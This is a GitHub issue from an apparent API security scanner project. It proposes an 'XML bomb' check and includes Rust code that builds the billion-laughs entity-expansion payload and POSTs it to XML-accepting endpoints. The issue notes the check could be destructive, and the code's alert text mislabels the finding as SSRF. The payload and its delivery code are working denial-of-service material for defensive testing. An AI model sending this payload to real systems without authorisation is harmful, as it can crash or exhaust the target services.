We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
This is a check suggested by @DeliciousBounty Currently not implemented until testing levels are implemented since it could be destructive
pub async fn check_xml_bomb(&self, auth: &Authorization) -> (CheckRetVal, Vec<Duration>) { let body = format!( r#" <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz "# ); let mut ret_val = CheckRetVal::default(); let mut vec_time = vec![]; // if let Some(content) = &op.request_body{ for oas_map in self.payloads.iter() { for (json_path, schema) in &oas_map.payload.map { // .filter_map(|x| x){ for (m, _operation) in oas_map .path .path_item .get_ops() .iter() .filter(|(m, _)| m == &Method::POST) .filter(|(_method, operation)| { operation .request_body .clone() .unwrap_or_default() .inner(&self.oas_value) .content .into_keys() .collect::<Vec<String>>() .contains(&"application/xml".to_string()) // if let Some(value) = &operation.request_body{ // for ( string_item, Mediatype_item) in &value.inner(&self.oas_value).content { // println!("{:?}", string_item); // if string_item == "application/xml"{ // println!("THere is one least"); // } // ; // } }) .next() // .filter(|(operation)| operation.1.request_body.unwrap().clone().inner(&self.oas_value).content.keys()) { // println!("{:?}", operation); println!("ENCONDING {:?}", &oas_map.path.path); let h = MHeader { name: "Content-type".to_string(), value: "application/xml".to_string(), }; let base_url = self.oas.servers().unwrap().iter().next().unwrap().clone(); let req = AttackRequest::builder() .uri(&base_url.url, &oas_map.path.path) .method(*m) .headers(vec![h]) .payload(&body) .parameters(vec![]) .auth(auth.clone()) .build(); print!("XML BOMB : "); /* let start = Instant::now(); expensive_function(); let duration = start.elapsed(); */ let start = Instant::now(); if let Ok(res) = req.send_request(true).await { //logging request/response/description ret_val.1.push(&req, &res, "Test for XML BOMB".to_string()); ret_val.0.push(( ResponseData { location: oas_map.path.path.clone(), alert_text: format!( "This parameter on the endpoint seems to be vulerable to ssrf.", // json_path[json_path.len() - 1] ), }, res.clone(), )); println!( "{}:{}", "Status".green().bold(), res.status.to_string().magenta() ); } else { println!("REQUEST FAILED"); } vec_time.push(start.elapsed()); } } } (ret_val, vec_time) }
The text was updated successfully, but these errors were encountered:
No branches or pull requests
This is a check suggested by @DeliciousBounty
Currently not implemented until testing levels are implemented since it could be destructive
The text was updated successfully, but these errors were encountered: